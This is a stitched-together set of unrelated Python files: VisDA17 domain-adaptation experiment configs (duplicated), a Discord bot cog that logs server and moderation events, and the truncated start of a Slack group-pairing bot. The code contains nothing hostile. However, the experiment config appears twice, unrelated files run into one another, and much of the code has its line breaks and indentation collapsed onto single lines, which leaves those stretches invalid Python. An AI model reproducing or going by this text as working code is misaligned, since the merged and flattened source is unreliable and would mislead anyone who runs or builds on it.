0.9, 'weight_decay': 0.001, 'nesterov': True, } }, 'fx_lr_decay_start': 0, 'fx_lr_decay_steps': 50000, 'fx_lr_decay_factor': 0.05, 'cls_opt': { 'name': 'SGD', 'kwargs': { 'lr': 0.01, 'momentum': 0.9, 'weight_decay': 0.001, 'nesterov': True, } }, 'cls_weight': 1.0, 'cls_trg_weight': 0.0, 'alignment_weight': None, 'alignment_w_steps': 10000, 'disc_opt': { 'name': 'SGD', 'kwargs': { 'lr': 0.005, 'momentum': 0.9, 'weight_decay': 0.001, 'nesterov': True, } }, 'disc_steps': 1, 'l2_weight': 0.0, } } if extra_hparams is not None: config['hparams'].update(extra_hparams) if extra_discriminator_hparams is not None: config['hparams']['discriminator']['hparams'].update(extra_discriminator_hparams) return config def register_experiments(registry): # Algorithm configs format: # nickname, algorithm_name, extra_hparams, extra_discriminator_hparams algorithms = [ ('source_only', 'ERM', None, None), ('dann_zero', 'DANN_NS', {'alignment_weight': 0.0}, None), ('dann', 'DANN_NS', {'alignment_weight': 0.1}, None), ] iwdan_extra_hparams = {'alignment_weight': 0.1, 'iw_update_period': 4000, 'importance_weighting': {'ma': 0.5}} algorithms.extend([ ('iwdan', 'IWDAN', iwdan_extra_hparams, None), ('iwcdan', 'IWCDAN', iwdan_extra_hparams, None), ]) algorithms.append( (f'sdann_4', 'SDANN', {'alignment_weight': 0.1}, {'beta': 4.0}) ) algorithms.extend([ ('asa_abs', 'DANN_SUPP_ABS', {'alignment_weight': 0.1}, {'history_size': 1000}), ('asa_sq', 'DANN_SUPP_SQ', {'alignment_weight': 0.1}, {'history_size': 1000}), ]) for imbalance_alpha in [0.0, 1.0, 1.5, 2.0]: for seed in range(1, 6): dataset_config = get_dataset_config_visda17_pareto_target_imbalance(imbalance_alpha, seed=seed) training_config = { 'seed': seed, 'num_steps': 50000, 'batch_size': 36, 'num_workers': 4, 'eval_period': 2500, 'log_period': 50, 'eval_bn_update': True, 'save_model': False, 'save_period': 1, 'disc_eval_period': 4, } for alg_nickname, algorithm_name, extra_hparams, extra_discriminator_hparams in algorithms: algorithm_config = get_algorithm_config(algorithm_name, extra_hparams, extra_discriminator_hparams) experiment_name = f'visda17/resnet50/seed_{seed}/s_alpha_{int(imbalance_alpha * 10):02d}/{alg_nickname}' experiment_config = { 'dataset': dataset_config, 'algorithm': algorithm_config, 'training': training_config, } 
registry.register(experiment_name, experiment_config)
"""Configs for VisDA17 experiments.""" def get_weighting_config_class_pareto(alpha, reverse, seed): return { 'name': 'class_pareto', 'kwargs': { 'alpha': alpha, 'reverse': reverse, 'seed': seed }, } def get_dataset_config_visda17_pareto_target_imbalance(alpha, seed=None): return { 'name': 'VisDA17', 'val_fraction': 0.15, 'mods': [], 'source': { 'index': 0, 'weighting': { 'name': 'class_uniform', 'kwargs': dict(), }, 'subsample': True, }, 'target': { 'index': 1, 'weighting': get_weighting_config_class_pareto(alpha, True, seed=seed), 'subsample': True, }, } def get_algorithm_config(algorithm, extra_hparams=None, extra_discriminator_hparams=None): # Common configs of all algorithms config = { 'name': algorithm, 'hparams': { 'da_network': { 'feature_extractor': { 'name': 'ResNet', 'hparams': { 'feature_dim': 256, 'pretrained': True, 'freeze_bn': False, 'resnet18': False, 'resnet_dropout': 0.0, 'fc_lr_factor': 1.0, 'fc_wd_factor': 1.0, } }, 'classifier': { 'name': 'LogLossClassifier', 'hparams': { 'num_hidden': None, 'special_init': True, } }, }, 'discriminator': { 'hparams': { 'num_hidden': 1024, 'depth': 3, 'spectral': False, 'history_size': 0, } }, 'ema_momentum': None, 'fx_opt': { 'name': 'SGD', 'kwargs': { 'lr': 0.001, 'momentum': 0.9, 'weight_decay': 0.001, 'nesterov': True, } }, 'fx_lr_decay_start': 0, 'fx_lr_decay_steps': 50000, 'fx_lr_decay_factor': 0.05, 'cls_opt': { 'name': 'SGD', 'kwargs': { 'lr': 0.01, 'momentum': 0.9, 'weight_decay': 0.001, 'nesterov': True, } }, 'cls_weight': 1.0, 'cls_trg_weight': 0.0, 'alignment_weight': None, 'alignment_w_steps': 10000, 'disc_opt': { 'name': 'SGD', 'kwargs': { 'lr': 0.005, 'momentum': 0.9, 'weight_decay': 0.001, 'nesterov': True, } }, 'disc_steps': 1, 'l2_weight': 0.0, } } if extra_hparams is not None: config['hparams'].update(extra_hparams) if extra_discriminator_hparams is not None: config['hparams']['discriminator']['hparams'].update(extra_discriminator_hparams) return config def register_experiments(registry): # Algorithm configs format: # nickname, algorithm_name, extra_hparams, extra_discriminator_hparams algorithms = [ ('source_only', 'ERM', None, None), ('dann_zero', 'DANN_NS', {'alignment_weight': 0.0}, None), ('dann', 'DANN_NS', {'alignment_weight': 0.1}, None), ] iwdan_extra_hparams = {'alignment_weight': 0.1, 'iw_update_period': 4000, 'importance_weighting': {'ma': 0.5}} algorithms.extend([ ('iwdan', 'IWDAN', iwdan_extra_hparams, None), ('iwcdan', 'IWCDAN', iwdan_extra_hparams, None), ]) algorithms.append( (f'sdann_4', 'SDANN', {'alignment_weight': 0.1}, {'beta': 4.0}) ) algorithms.extend([ ('asa_abs', 'DANN_SUPP_ABS', {'alignment_weight': 0.1}, {'history_size': 1000}), ('asa_sq', 'DANN_SUPP_SQ', {'alignment_weight': 0.1}, {'history_size': 1000}), ]) for imbalance_alpha in [0.0, 1.0, 1.5, 2.0]: for seed in range(1, 6): dataset_config = get_dataset_config_visda17_pareto_target_imbalance(imbalance_alpha, seed=seed) training_config = { 'seed': seed, 'num_steps': 50000, 'batch_size': 36, 'num_workers': 4, 'eval_period': 2500, 'log_period': 50, 'eval_bn_update': True, 'save_model': False, 'save_period': 1, 'disc_eval_period': 4, } for alg_nickname, algorithm_name, extra_hparams, extra_discriminator_hparams in algorithms: algorithm_config = get_algorithm_config(algorithm_name, extra_hparams, extra_discriminator_hparams) experiment_name = f'visda17/resnet50/seed_{seed}/s_alpha_{int(imbalance_alpha * 10):02d}/{alg_nickname}' experiment_config = { 'dataset': dataset_config, 'algorithm': algorithm_config, 'training': training_config, } 
registry.register(experiment_name, experiment_config)
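# --- Illustrative sketch (the real registry class lives elsewhere in the project) ---
# register_experiments() only needs an object exposing register(). A minimal
# dict-backed stand-in shows the expected volume of configs:
# 4 imbalance alphas x 5 seeds x 8 algorithms = 160 experiments.
class _DictRegistry:
    def __init__(self):
        self.experiments = {}

    def register(self, name, config):
        self.experiments[name] = config


if __name__ == '__main__':
    _registry = _DictRegistry()
    register_experiments(_registry)
    assert len(_registry.experiments) == 160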
import asyncio
import difflib
import itertools
import typing as t
from datetime import datetime, timezone
from itertools import zip_longest

import discord
from dateutil.relativedelta import relativedelta
from deepdiff import DeepDiff
from discord import Colour, Message, Thread
from discord.abc import GuildChannel
from discord.ext.commands import Cog, Context
from discord.utils import escape_markdown, format_dt, snowflake_time

from bot.bot import Bot
from bot.constants import Categories, Channels, Colours, Emojis, Event, Guild as GuildConstant, Icons, Roles, URLs
from bot.log import get_logger
from bot.utils import time
from bot.utils.messages import format_user

log = get_logger(__name__)

GUILD_CHANNEL = t.Union[discord.CategoryChannel, discord.TextChannel, discord.VoiceChannel]

CHANNEL_CHANGES_UNSUPPORTED = ("permissions",)
CHANNEL_CHANGES_SUPPRESSED = ("_overwrites", "position")

ROLE_CHANGES_UNSUPPORTED = ("colour", "permissions")

VOICE_STATE_ATTRIBUTES = {
    "channel.name": "Channel",
    "self_stream": "Streaming",
    "self_video": "Broadcasting",
}


class ModLog(Cog, name="ModLog"):
    """Logging for server events and staff actions."""

    def __init__(self, bot: Bot):
        self.bot = bot
        self._ignored = {event: [] for event in Event}
        self._cached_edits = []

    async def upload_log(
        self,
        messages: t.Iterable[discord.Message],
        actor_id: int,
        attachments: t.Iterable[t.List[str]] = None
    ) -> str:
        """Upload message logs to the database and return a URL to a page for viewing the logs."""
        if attachments is None:
            attachments = []

        response = await self.bot.api_client.post(
            'bot/deleted-messages',
            json={
                'actor': actor_id,
                'creation': datetime.now(timezone.utc).isoformat(),
                'deletedmessage_set': [
                    {
                        'id': message.id,
                        'author': message.author.id,
                        'channel_id': message.channel.id,
                        'content': message.content.replace("\0", ""),  # Null chars cause 400.
                        'embeds': [embed.to_dict() for embed in message.embeds],
                        'attachments': attachment,
                    }
                    for message, attachment in zip_longest(messages, attachments, fillvalue=[])
                ]
            }
        )

        return f"{URLs.site_logs_view}/{response['id']}"

    def ignore(self, event: Event, *items: int) -> None:
        """Add event to ignored events to suppress log emission."""
        for item in items:
            if item not in self._ignored[event]:
                self._ignored[event].append(item)

    async def send_log_message(
        self,
        icon_url: t.Optional[str],
        colour: t.Union[discord.Colour, int],
        title: t.Optional[str],
        text: str,
        thumbnail: t.Optional[t.Union[str, discord.Asset]] = None,
        channel_id: int = Channels.mod_log,
        ping_everyone: bool = False,
        files: t.Optional[t.List[discord.File]] = None,
        content: t.Optional[str] = None,
        additional_embeds: t.Optional[t.List[discord.Embed]] = None,
        timestamp_override: t.Optional[datetime] = None,
        footer: t.Optional[str] = None,
    ) -> Context:
        """Generate log embed and send to logging channel."""
        await self.bot.wait_until_guild_available()
        # Truncate string directly here to avoid removing newlines
        embed = discord.Embed(
            description=text[:4093] + "..." if len(text) > 4096 else text
        )

        if title and icon_url:
            embed.set_author(name=title, icon_url=icon_url)

        embed.colour = colour
        embed.timestamp = timestamp_override or datetime.utcnow()

        if footer:
            embed.set_footer(text=footer)

        if thumbnail:
            embed.set_thumbnail(url=thumbnail)

        if ping_everyone:
            if content:
                content = f"<@&{Roles.moderators}> {content}"
            else:
                content = f"<@&{Roles.moderators}>"

        # Truncate content to 2000 characters and append an ellipsis.
        if content and len(content) > 2000:
            content = content[:2000 - 3] + "..."
channel = self.bot.get_channel(channel_id) log_message = await channel.send( content=content, embed=embed, files=files ) if additional_embeds: for additional_embed in additional_embeds: await channel.send(embed=additional_embed) return await self.bot.get_context(log_message) # Optionally return for use with antispam @Cog.listener() async def on_guild_channel_create(self, channel: GUILD_CHANNEL) -> None: """Log channel create event to mod log.""" if channel.guild.id != GuildConstant.id: return if isinstance(channel, discord.CategoryChannel): title = "Category created" message = f"{channel.name} (`{channel.id}`)" elif isinstance(channel, discord.VoiceChannel): title = "Voice channel created" if channel.category: message = f"{channel.category}/{channel.name} (`{channel.id}`)" else: message = f"{channel.name} (`{channel.id}`)" else: title = "Text channel created" if channel.category: message = f"{channel.category}/{channel.name} (`{channel.id}`)" else: message = f"{channel.name} (`{channel.id}`)" await self.send_log_message(Icons.hash_green, Colours.soft_green, title, message) @Cog.listener() async def on_guild_channel_delete(self, channel: GUILD_CHANNEL) -> None: """Log channel delete event to mod log.""" if channel.guild.id != GuildConstant.id: return if isinstance(channel, discord.CategoryChannel): title = "Category deleted" elif isinstance(channel, discord.VoiceChannel): title = "Voice channel deleted" else: title = "Text channel deleted" if channel.category and not isinstance(channel, discord.CategoryChannel): message = f"{channel.category}/{channel.name} (`{channel.id}`)" else: message = f"{channel.name} (`{channel.id}`)" await self.send_log_message( Icons.hash_red, Colours.soft_red, title, message ) @Cog.listener() async def on_guild_channel_update(self, before: GUILD_CHANNEL, after: GuildChannel) -> None: """Log channel update event to mod log.""" if before.guild.id != GuildConstant.id: return if before.id in self._ignored[Event.guild_channel_update]: self._ignored[Event.guild_channel_update].remove(before.id) return # Two channel updates are sent for a single edit: 1 for topic and 1 for category change. # TODO: remove once support is added for ignoring multiple occurrences for the same channel. help_categories = (Categories.help_available, Categories.help_dormant, Categories.help_in_use) if after.category and after.category.id in help_categories: return diff = DeepDiff(before, after) changes = [] done = [] diff_values = diff.get("values_changed", {}) diff_values.update(diff.get("type_changes", {})) for key, value in diff_values.items(): if not key: # Not sure why, but it happens continue key = key[5:] # Remove "root." prefix if "[" in key: key = key.split("[", 1)[0] if "." in key: key = key.split(".", 1)[0] if key in done or key in CHANNEL_CHANGES_SUPPRESSED: continue if key in CHANNEL_CHANGES_UNSUPPORTED: changes.append(f"**{key.title()}** updated") else: new = value["new_value"] old = value["old_value"] # Discord does not treat consecutive backticks ("``") as an empty inline code block, so the markdown # formatting is broken when `new` and/or `old` are empty values. "None" is used for these cases so # formatting is preserved. 
changes.append(f"**{key.title()}:** `{old or "None"}` **→** `{new or "None"}`") done.append(key) if not changes: return message = "" for item in sorted(changes): message += f"{Emojis.bullet} {item}\n" if after.category: message = f"**{after.category}/#{after.name} (`{after.id}`)**\n{message}" else: message = f"**#{after.name}** (`{after.id}`)\n{message}" await self.send_log_message( Icons.hash_blurple, Colour.og_blurple(), "Channel updated", message ) @Cog.listener() async def on_guild_role_create(self, role: discord.Role) -> None: """Log role create event to mod log.""" if role.guild.id != GuildConstant.id: return await self.send_log_message( Icons.crown_green, Colours.soft_green, "Role created", f"`{role.id}`" ) @Cog.listener() async def on_guild_role_delete(self, role: discord.Role) -> None: """Log role delete event to mod log.""" if role.guild.id != GuildConstant.id: return await self.send_log_message( Icons.crown_red, Colours.soft_red, "Role removed", f"{role.name} (`{role.id}`)" ) @Cog.listener() async def on_guild_role_update(self, before: discord.Role, after: discord.Role) -> None: """Log role update event to mod log.""" if before.guild.id != GuildConstant.id: return diff = DeepDiff(before, after) changes = [] done = [] diff_values = diff.get("values_changed", {}) diff_values.update(diff.get("type_changes", {})) for key, value in diff_values.items(): if not key: # Not sure why, but it happens continue key = key[5:] # Remove "root." prefix if "[" in key: key = key.split("[", 1)[0] if "." in key: key = key.split(".", 1)[0] if key in done or key == "color": continue if key in ROLE_CHANGES_UNSUPPORTED: changes.append(f"**{key.title()}** updated") else: new = value["new_value"] old = value["old_value"] changes.append(f"**{key.title()}:** `{old}` **→** `{new}`") done.append(key) if not changes: return message = "" for item in sorted(changes): message += f"{Emojis.bullet} {item}\n" message = f"**{after.name}** (`{after.id}`)\n{message}" await self.send_log_message( Icons.crown_blurple, Colour.og_blurple(), "Role updated", message ) @Cog.listener() async def on_guild_update(self, before: discord.Guild, after: discord.Guild) -> None: """Log guild update event to mod log.""" if before.id != GuildConstant.id: return diff = DeepDiff(before, after) changes = [] done = [] diff_values = diff.get("values_changed", {}) diff_values.update(diff.get("type_changes", {})) for key, value in diff_values.items(): if not key: # Not sure why, but it happens continue key = key[5:] # Remove "root." prefix if "[" in key: key = key.split("[", 1)[0] if "." 
in key: key = key.split(".", 1)[0] if key in done: continue new = value["new_value"] old = value["old_value"] changes.append(f"**{key.title()}:** `{old}` **→** `{new}`") done.append(key) if not changes: return message = "" for item in sorted(changes): message += f"{Emojis.bullet} {item}\n" message = f"**{after.name}** (`{after.id}`)\n{message}" await self.send_log_message( Icons.guild_update, Colour.og_blurple(), "Guild updated", message, thumbnail=after.icon.with_static_format("png") ) @Cog.listener() async def on_member_ban(self, guild: discord.Guild, member: discord.Member) -> None: """Log ban event to user log.""" if guild.id != GuildConstant.id: return if member.id in self._ignored[Event.member_ban]: self._ignored[Event.member_ban].remove(member.id) return await self.send_log_message( Icons.user_ban, Colours.soft_red, "User banned", format_user(member), thumbnail=member.display_avatar.url, channel_id=Channels.user_log ) @Cog.listener() async def on_member_join(self, member: discord.Member) -> None: """Log member join event to user log.""" if member.guild.id != GuildConstant.id: return now = datetime.now(timezone.utc) difference = abs(relativedelta(now, member.created_at)) message = format_user(member) + "\n\n**Account age:** " + time.humanize_delta(difference) if difference.days < 1 and difference.months < 1 and difference.years < 1: # New user account! message = f"{Emojis.new} {message}" await self.send_log_message( Icons.sign_in, Colours.soft_green, "User joined", message, thumbnail=member.display_avatar.url, channel_id=Channels.user_log ) @Cog.listener() async def on_member_remove(self, member: discord.Member) -> None: """Log member leave event to user log.""" if member.guild.id != GuildConstant.id: return if member.id in self._ignored[Event.member_remove]: self._ignored[Event.member_remove].remove(member.id) return await self.send_log_message( Icons.sign_out, Colours.soft_red, "User left", format_user(member), thumbnail=member.display_avatar.url, channel_id=Channels.user_log ) @Cog.listener() async def on_member_unban(self, guild: discord.Guild, member: discord.User) -> None: """Log member unban event to mod log.""" if guild.id != GuildConstant.id: return if member.id in self._ignored[Event.member_unban]: self._ignored[Event.member_unban].remove(member.id) return await self.send_log_message( Icons.user_unban, Colour.og_blurple(), "User unbanned", format_user(member), thumbnail=member.display_avatar.url, channel_id=Channels.mod_log ) @staticmethod def get_role_diff(before: t.List[discord.Role], after: t.List[discord.Role]) -> t.List[str]: """Return a list of strings describing the roles added and removed.""" changes = [] before_roles = set(before) after_roles = set(after) for role in (before_roles - after_roles): changes.append(f"**Role removed:** {role.name} (`{role.id}`)") for role in (after_roles - before_roles): changes.append(f"**Role added:** {role.name} (`{role.id}`)") return changes @Cog.listener() async def on_member_update(self, before: discord.Member, after: discord.Member) -> None: """Log member update event to user log.""" if before.guild.id != GuildConstant.id: return if before.id in self._ignored[Event.member_update]: self._ignored[Event.member_update].remove(before.id) return changes = self.get_role_diff(before.roles, after.roles) # The regex is a simple way to exclude all sequence and mapping types. diff = DeepDiff(before, after, exclude_regex_paths=r".*\[.*") # A type change seems to always take precedent over a value change. 
Furthermore, it will # include the value change along with the type change anyway. Therefore, it's OK to # "overwrite" values_changed; in practice there will never even be anything to overwrite. diff_values = {**diff.get("values_changed", {}), **diff.get("type_changes", {})} for attr, value in diff_values.items(): if not attr: # Not sure why, but it happens. continue attr = attr[5:] # Remove "root." prefix. attr = attr.replace("_", " ").replace(".", " ").capitalize() new = value.get("new_value") old = value.get("old_value") changes.append(f"**{attr}:** `{old}` **→** `{new}`") if not changes: return message = "" for item in sorted(changes): message += f"{Emojis.bullet} {item}\n" message = f"{format_user(after)}\n{message}" await self.send_log_message( icon_url=Icons.user_update, colour=Colour.og_blurple(), title="Member updated", text=message, thumbnail=after.display_avatar.url, channel_id=Channels.user_log ) def is_message_blacklisted(self, message: Message) -> bool: """Return true if the message is in a blacklisted thread or channel.""" # Ignore bots or DMs if message.author.bot or not message.guild: return True return self.is_channel_ignored(message.channel.id) def is_channel_ignored(self, channel_id: int) -> bool: """ Return true if the channel, or parent channel in the case of threads, passed should be ignored by modlog. Currently ignored channels are: 1. Channels not in the guild we care about (constants.Guild.id). 2. Channels that mods do not have view permissions to 3. Channels in constants.Guild.modlog_blacklist """ channel = self.bot.get_channel(channel_id) # Ignore not found channels, DMs, and messages outside of the main guild. if not channel or not hasattr(channel, "guild") or channel.guild.id != GuildConstant.id: return True # Look at the parent channel of a thread. if isinstance(channel, Thread): channel = channel.parent # Mod team doesn't have view permission to the channel. if not channel.permissions_for(channel.guild.get_role(Roles.mod_team)).view_channel: return True return channel.id in GuildConstant.modlog_blacklist async def log_cached_deleted_message(self, message: discord.Message) -> None: """ Log the message's details to message change log. This is called when a cached message is deleted. """ channel = message.channel author = message.author if self.is_message_blacklisted(message): return if message.id in self._ignored[Event.message_delete]: self._ignored[Event.message_delete].remove(message.id) return if channel.category: response = ( f"**Author:** {format_user(author)}\n" f"**Channel:** {channel.category}/#{channel.name} (`{channel.id}`)\n" f"**Message ID:** `{message.id}`\n" f"**Sent at:** {format_dt(message.created_at)}\n" f"[Jump to message]({message.jump_url})\n" "\n" ) else: response = ( f"**Author:** {format_user(author)}\n" f"**Channel:** #{channel.name} (`{channel.id}`)\n" f"**Message ID:** `{message.id}`\n" f"**Sent at:** {format_dt(message.created_at)}\n" f"[Jump to message]({message.jump_url})\n" "\n" ) if message.attachments: # Prepend the message metadata with the number of attachments response = f"**Attachments:** {len(message.attachments)}\n" + response # Shorten the message content if necessary content = message.clean_content remaining_chars = 4090 - len(response) if len(content) > remaining_chars: botlog_url = await self.upload_log(messages=[message], actor_id=message.author.id) ending = f"\n\nMessage truncated, [full message here]({botlog_url})." 
            truncation_point = remaining_chars - len(ending)
            content = f"{content[:truncation_point]}...{ending}"

        response += f"{content}"

        await self.send_log_message(
            Icons.message_delete,
            Colours.soft_red,
            "Message deleted",
            response,
            channel_id=Channels.message_log
        )

    async def log_uncached_deleted_message(self, event: discord.RawMessageDeleteEvent) -> None:
        """
        Log the message's details to message change log.

        This is called when a message absent from the cache is deleted.
        Hence, the message contents aren't logged.
        """
        await self.bot.wait_until_guild_available()
        if self.is_channel_ignored(event.channel_id):
            return

        if event.message_id in self._ignored[Event.message_delete]:
            self._ignored[Event.message_delete].remove(event.message_id)
            return

        channel = self.bot.get_channel(event.channel_id)
        if channel.category:
            response = (
                f"**Channel:** {channel.category}/#{channel.name} (`{channel.id}`)\n"
                f"**Message ID:** `{event.message_id}`\n"
                f"**Sent at:** {format_dt(snowflake_time(event.message_id))}\n"
                "\n"
                "This message was not cached, so the message content cannot be displayed."
            )
        else:
            response = (
                f"**Channel:** #{channel.name} (`{channel.id}`)\n"
                f"**Message ID:** `{event.message_id}`\n"
                f"**Sent at:** {format_dt(snowflake_time(event.message_id))}\n"
                "\n"
                "This message was not cached, so the message content cannot be displayed."
            )

        await self.send_log_message(
            Icons.message_delete,
            Colours.soft_red,
            "Message deleted",
            response,
            channel_id=Channels.message_log
        )

    @Cog.listener()
    async def on_raw_message_delete(self, event: discord.RawMessageDeleteEvent) -> None:
        """Log message deletions to message change log."""
        if event.cached_message is not None:
            await self.log_cached_deleted_message(event.cached_message)
        else:
            await self.log_uncached_deleted_message(event)

    @Cog.listener()
    async def on_message_edit(self, msg_before: discord.Message, msg_after: discord.Message) -> None:
        """Log message edit event to message change log."""
        if self.is_message_blacklisted(msg_before):
            return

        self._cached_edits.append(msg_before.id)

        if msg_before.content == msg_after.content:
            return

        channel = msg_before.channel
        channel_name = f"{channel.category}/#{channel.name}" if channel.category else f"#{channel.name}"

        cleaned_contents = (escape_markdown(msg.clean_content).split() for msg in (msg_before, msg_after))
        # Getting the difference per words and group them by type - add, remove, same
        # Note that this is intended grouping without sorting
        diff = difflib.ndiff(*cleaned_contents)
        diff_groups = tuple(
            (diff_type, tuple(s[2:] for s in diff_words))
            for diff_type, diff_words in itertools.groupby(diff, key=lambda s: s[0])
        )

        content_before: t.List[str] = []
        content_after: t.List[str] = []

        for index, (diff_type, words) in enumerate(diff_groups):
            sub = ' '.join(words)
            if diff_type == '-':
                content_before.append(f"[{sub}](http://o.hi)")
            elif diff_type == '+':
                content_after.append(f"[{sub}](http://o.hi)")
            elif diff_type == ' ':
                if len(words) > 2:
                    sub = (
                        f"{words[0] if index > 0 else ''}"
                        " ... "
                        f"{words[-1] if index < len(diff_groups) - 1 else ''}"
                    )
                content_before.append(sub)
                content_after.append(sub)

        response = (
            f"**Author:** {format_user(msg_before.author)}\n"
            f"**Channel:** {channel_name} (`{channel.id}`)\n"
            f"**Message ID:** `{msg_before.id}`\n"
            "\n"
            f"**Before**:\n{' '.join(content_before)}\n"
            f"**After**:\n{' '.join(content_after)}\n"
            "\n"
            f"[Jump to message]({msg_after.jump_url})"
        )

        if msg_before.edited_at:
            # Message was previously edited, to assist with self-bot detection, use the edited_at
            # datetime as the baseline and create a human-readable delta between this edit event
            # and the last time the message was edited
            timestamp = msg_before.edited_at
            delta = time.humanize_delta(msg_after.edited_at, msg_before.edited_at)
            footer = f"Last edited {delta} ago"
        else:
            # Message was not previously edited, use the created_at datetime as the baseline, no
            # delta calculation needed
            timestamp = msg_before.created_at
            footer = None

        await self.send_log_message(
            Icons.message_edit,
            Colour.og_blurple(),
            "Message edited",
            response,
            channel_id=Channels.message_log,
            timestamp_override=timestamp,
            footer=footer
        )

    @Cog.listener()
    async def on_raw_message_edit(self, event: discord.RawMessageUpdateEvent) -> None:
        """Log raw message edit event to message change log."""
        if event.guild_id is None:
            return  # ignore DM edits

        await self.bot.wait_until_guild_available()
        try:
            channel = self.bot.get_channel(int(event.data["channel_id"]))
            message = await channel.fetch_message(event.message_id)
        except discord.NotFound:  # Was deleted before we got the event
            return

        if self.is_message_blacklisted(message):
            return

        await asyncio.sleep(1)  # Wait here in case the normal event was fired

        if event.message_id in self._cached_edits:
            # It was in the cache and the normal event was fired, so we can just ignore it
            self._cached_edits.remove(event.message_id)
            return

        channel = message.channel
        channel_name = f"{channel.category}/#{channel.name}" if channel.category else f"#{channel.name}"

        before_response = (
            f"**Author:** {format_user(message.author)}\n"
            f"**Channel:** {channel_name} (`{channel.id}`)\n"
            f"**Message ID:** `{message.id}`\n"
            "\n"
            "This message was not cached, so the message content cannot be displayed."
) after_response = ( f"**Author:** {format_user(message.author)}\n" f"**Channel:** {channel_name} (`{channel.id}`)\n" f"**Message ID:** `{message.id}`\n" "\n" f"{message.clean_content}" ) await self.send_log_message( Icons.message_edit, Colour.og_blurple(), "Message edited (Before)", before_response, channel_id=Channels.message_log ) await self.send_log_message( Icons.message_edit, Colour.og_blurple(), "Message edited (After)", after_response, channel_id=Channels.message_log ) @Cog.listener() async def on_thread_update(self, before: Thread, after: Thread) -> None: """Log thread archiving, un-archiving and name edits.""" if self.is_channel_ignored(after.id): log.trace("Ignoring update of thread %s (%d)", after.mention, after.id) return if before.name != after.name: await self.send_log_message( Icons.hash_blurple, Colour.og_blurple(), "Thread name edited", ( f"Thread {after.mention} (`{after.id}`) from {after.parent.mention} (`{after.parent.id}`): " f"`{before.name}` -> `{after.name}`" ) ) return if not before.archived and after.archived: colour = Colours.soft_red action = "archived" icon = Icons.hash_red elif before.archived and not after.archived: colour = Colours.soft_green action = "un-archived" icon = Icons.hash_green else: return await self.send_log_message( icon, colour, f"Thread {action}", ( f"Thread {after.mention} ({after.name}, `{after.id}`) from {after.parent.mention} " f"(`{after.parent.id}`) was {action}" ) ) @Cog.listener() async def on_thread_delete(self, thread: Thread) -> None: """Log thread deletion.""" if self.is_channel_ignored(thread.id): log.trace("Ignoring deletion of thread %s (%d)", thread.mention, thread.id) return await self.send_log_message( Icons.hash_red, Colours.soft_red, "Thread deleted", ( f"Thread {thread.mention} ({thread.name}, `{thread.id}`) from {thread.parent.mention} " f"(`{thread.parent.id}`) deleted" ) ) @Cog.listener() async def on_thread_join(self, thread: Thread) -> None: """Log thread creation.""" # If we are in the thread already we can most probably assume we already logged it? # We don't really have a better way of doing this since the API doesn't make any difference between the two if thread.me: return if self.is_channel_ignored(thread.id): log.trace("Ignoring creation of thread %s (%d)", thread.mention, thread.id) return await self.send_log_message( Icons.hash_green, Colours.soft_green, "Thread created", ( f"Thread {thread.mention} ({thread.name}, `{thread.id}`) from {thread.parent.mention} " f"(`{thread.parent.id}`) created" ) ) @Cog.listener() async def on_voice_state_update( self, member: discord.Member, before: discord.VoiceState, after: discord.VoiceState ) -> None: """Log member voice state changes to the voice log channel.""" if ( member.guild.id != GuildConstant.id or (before.channel and self.is_channel_ignored(before.channel.id)) or (after.channel and self.is_channel_ignored(after.channel.id)) ): return if member.id in self._ignored[Event.voice_state_update]: self._ignored[Event.voice_state_update].remove(member.id) return # Exclude all channel attributes except the name. diff = DeepDiff( before, after, exclude_paths=("root.session_id", "root.afk"), exclude_regex_paths=r"root\.channel\.(?!name)", ) # A type change seems to always take precedent over a value change. Furthermore, it will # include the value change along with the type change anyway. Therefore, it's OK to # "overwrite" values_changed; in practice there will never even be anything to overwrite. 
diff_values = {**diff.get("values_changed", {}), **diff.get("type_changes", {})} icon = Icons.voice_state_blue colour = Colour.og_blurple() changes = [] for attr, values in diff_values.items(): if not attr: # Not sure why, but it happens. continue old = values["old_value"] new = values["new_value"] attr = attr[5:] # Remove "root." prefix. attr = VOICE_STATE_ATTRIBUTES.get(attr, attr.replace("_", " ").capitalize()) changes.append(f"**{attr}:** `{old}` **→** `{new}`") # Set the embed icon and colour depending on which attribute changed. if any(name in attr for name in ("Channel", "deaf", "mute")): if new is None or new is True: # Left a channel or was muted/deafened. icon = Icons.voice_state_red colour = Colours.soft_red elif old is None or old is True: # Joined a channel or was unmuted/undeafened. icon = Icons.voice_state_green colour = Colours.soft_green if not changes: return message = "\n".join(f"{Emojis.bullet} {item}" for item in sorted(changes)) message = f"{format_user(member)}\n{message}" await self.send_log_message( icon_url=icon, colour=colour, title="Voice state updated", text=message, thumbnail=member.display_avatar.url, channel_id=Channels.voice_log ) def setup(bot: Bot) -> None: """Load the ModLog cog.""" bot.add_cog(ModLog(bot))
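# --- Illustrative sketch (standalone) ---
# on_message_edit() above diffs the old and new message word-by-word with
# difflib.ndiff and groups the output by its one-character prefix
# ('-' removed, '+' added, ' ' unchanged; '?' hint lines are filtered here):
import difflib
import itertools

before = "the quick brown fox".split()
after = "the slow brown fox jumps".split()

diff = [s for s in difflib.ndiff(before, after) if s[0] != '?']
groups = [
    (diff_type, [s[2:] for s in words])
    for diff_type, words in itertools.groupby(diff, key=lambda s: s[0])
]
# -> [(' ', ['the']), ('-', ['quick']), ('+', ['slow']),
#     (' ', ['brown', 'fox']), ('+', ['jumps'])]
print(groups)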
import random
import uuid
import re
from datetime import datetime

from slack import WebClient
from slack.errors import SlackApiError


def n_even_chunks(lst, n):
    """Yield n chunks from lst, as evenly sized as possible."""
    last = 0
    for i in range(1, n + 1):
        cur = int(round(i * (len(lst) / n)))
        yield lst[last:cur]
        last = cur


class Bot:
    def __init__(self, token, config, bot_env):
        self.client = None
        self.token = token
        self.config = config
        self.bot_env = bot_env

    def init_slack(self):
        self.client = WebClient(self.token)

    def get_subjects(self):
        subjects = self.config["subjects"]
        return f"*{random.choice(subjects)}* eller *{random.choice(subjects)}*"

    def get_place(self):
        places = self.config["places"]
        return random.choice(places)

    def get_tips(self):
        tips = self.config["tips"]
        return random.choice(tips)

    def invite_members_to_room(self, list_of_reaction_members):
        random.shuffle(list_of_reaction_members)
        attach = []
        if len(list_of_reaction_members) < self.config["group_size"]:
            text = self.config["texts"]["noop"]
        else:
            text = self.config["texts"]["intro"]
            for chunk in n_even_chunks(
                list_of_reaction_members,
                len(list_of_reaction_members) // self.config["group_size"],
            ):
                users = ", ".join([f"<@{x}>" for x in chunk])
                attach.append(
                    {
                        "fallback": "TODO",
                        "color": "#36a64f",
                        "title": f"{self.get_place()}",
